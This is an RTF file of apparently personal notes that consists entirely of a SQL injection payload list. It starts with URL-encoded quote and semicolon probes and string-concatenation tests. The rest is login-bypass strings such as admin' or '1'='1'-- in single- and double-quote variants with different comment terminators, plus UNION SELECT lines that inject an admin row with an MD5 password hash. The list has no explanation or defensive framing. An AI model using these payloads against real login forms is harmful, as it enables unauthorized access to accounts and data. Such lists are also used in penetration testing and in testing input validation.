{\rtf1\ansi\ansicpg1252\cocoartf1404\cocoasubrtf470
{\fonttbl\f0\fnil\fcharset0 Monaco;\f1\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;\red31\green35\blue38;\red255\green255\blue255;\red52\green52\blue52;
}
\paperw11900\paperh16840\margl1440\margr1440\vieww16920\viewh10780\viewkind0
\deftab720
\pard\pardeftab720\sl288\slmult1\partightenfactor0

\f0\fs20 \cf2 \cb3 \expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 " / %22\
; / %3B\
%%2727\
%25%27\
`+HERP\
'||'DERP\
'+'herp\
' ' DERP
\f1\fs24 \cf0 \cb1 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 \
\pard\pardeftab720\partightenfactor0

\f0\fs20 \cf4 \expnd0\expndtw0\kerning0
or 1=1\uc0\u8232 or 1=1--\u8232 or 1=1#\u8232 or 1=1/*\u8232 admin' --\u8232 admin' #\u8232 admin'/*\u8232 admin' or '1'='1\u8232 admin' or '1'='1'--\u8232 admin' or '1'='1'#\u8232 admin' or '1'='1'/*\u8232 admin'or 1=1 or ''='\u8232 admin' or 1=1\u8232 admin' or 1=1--\u8232 admin' or 1=1#\u8232 admin' or 1=1/*\u8232 admin') or ('1'='1\u8232 admin') or ('1'='1'--\u8232 admin') or ('1'='1'#\u8232 admin') or ('1'='1'/*\u8232 admin') or '1'='1\u8232 admin') or '1'='1'--\u8232 admin') or '1'='1'#\u8232 admin') or '1'='1'/*\u8232 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055\u8232 admin" --\u8232 admin" #\u8232 admin"/*\u8232 admin" or "1"="1\u8232 admin" or "1"="1"--\u8232 admin" or "1"="1"#\u8232 admin" or "1"="1"/*\u8232 admin"or 1=1 or ""="\u8232 admin" or 1=1\u8232 admin" or 1=1--\u8232 admin" or 1=1#\u8232 admin" or 1=1/*\u8232 admin") or ("1"="1\u8232 admin") or ("1"="1"--\u8232 admin") or ("1"="1"#\u8232 admin") or ("1"="1"/*\u8232 admin") or "1"="1\u8232 admin") or "1"="1"--\u8232 admin") or "1"="1"#\u8232 admin") or "1"="1"/*\u8232 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055}